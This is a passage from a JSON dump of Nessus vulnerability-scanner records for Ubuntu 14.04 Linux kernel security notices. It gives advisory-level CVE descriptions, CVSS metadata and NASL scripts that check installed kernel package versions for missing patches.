netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter implementation. On systems running 32 bit kernels, a local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-wily vulnerabilities (USN-2930-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8767", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2782", "CVE-2016-3134", "CVE-2016-3135"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2930-2.NASL", "href": "https://www.tenable.com/plugins/nessus/89935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2930-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89935);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n script_xref(name:\"USN\", value:\"2930-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-wily vulnerabilities (USN-2930-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter\nimplementation. On systems running 32 bit kernels, a local\nunprivileged attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code with administrative\nprivileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2930-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2930-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-34-generic\", pkgver:\"4.2.0-34.39~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-34-generic-lpae\", pkgver:\"4.2.0-34.39~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-34-lowlatency\", pkgver:\"4.2.0-34.39~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:56", "description": "USN-2948-1 fixed vulnerabilities in the Ubuntu 14.10 Linux kernel backported to Ubuntu 14.04 LTS. An incorrect reference counting fix in the radeon driver introduced a regression that could cause a system crash. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-utopic regression (USN-2948-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8812", "CVE-2016-0723", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2782", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2948-2.NASL", "href": "https://www.tenable.com/plugins/nessus/90507", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2948-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90507);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2948-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-utopic regression (USN-2948-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-2948-1 fixed vulnerabilities in the Ubuntu 14.10 Linux kernel\nbackported to Ubuntu 14.04 LTS. An incorrect reference counting fix in\nthe radeon driver introduced a regression that could cause a system\ncrash. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the\nLinux kernel did not properly sanity check the interfaces\nand endpoints reported by the device. An attacker with\nphysical access could cause a denial of service (system\ncrash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability\nin the Linux kernel's CXGB3 driver. A local attacker could\nuse this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl\nhandler for the TTY driver in the Linux kernel. A local\nattacker could use this to cause a denial of service (system\ncrash) or expose sensitive information. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel\nvulnerability in the Linux Extended Verification Module\n(EVM). An attacker could use this to affect system\nintegrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly\naccounted file descriptors to the original opener for\nin-flight file descriptors sent over a unix domain socket. A\nlocal attacker could use this to cause a denial of service\n(resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo\ndevices in the Linux kernel did not properly sanity check\nthe endpoints reported by the device. An attacker with\nphysical access could cause a denial of service (system\ncrash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce\nlimits on the amount of data allocated to buffer pipes. A\nlocal attacker could use this to cause a denial of service\n(resource exhaustion). (CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2948-2/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-3.16-generic,\nlinux-image-3.16-generic-lpae and / or linux-image-3.16-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2948-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-70-generic\", pkgver:\"3.16.0-70.90~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-70-generic-lpae\", pkgver:\"3.16.0-70.90~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-70-lowlatency\", pkgver:\"3.16.0-70.90~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.16-generic / linux-image-3.16-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:14", "description": "Ralf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-utopic vulnerabilities (USN-2948-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8812", "CVE-2016-0723", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2782", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2948-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90405", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2948-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90405);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2948-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-utopic vulnerabilities (USN-2948-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ralf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2948-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-3.16-generic,\nlinux-image-3.16-generic-lpae and / or linux-image-3.16-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2948-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-69-generic\", pkgver:\"3.16.0-69.89~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-69-generic-lpae\", pkgver:\"3.16.0-69.89~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.16.0-69-lowlatency\", pkgver:\"3.16.0-69.89~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.16-generic / linux-image-3.16-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-07T14:10:23", "description": "Update to latest upstream stable release, Linux v4.3.4. Elan touchpad fixes. ---- Update to 4.3.y stable series. Fixes across the tree.\n\nNote that 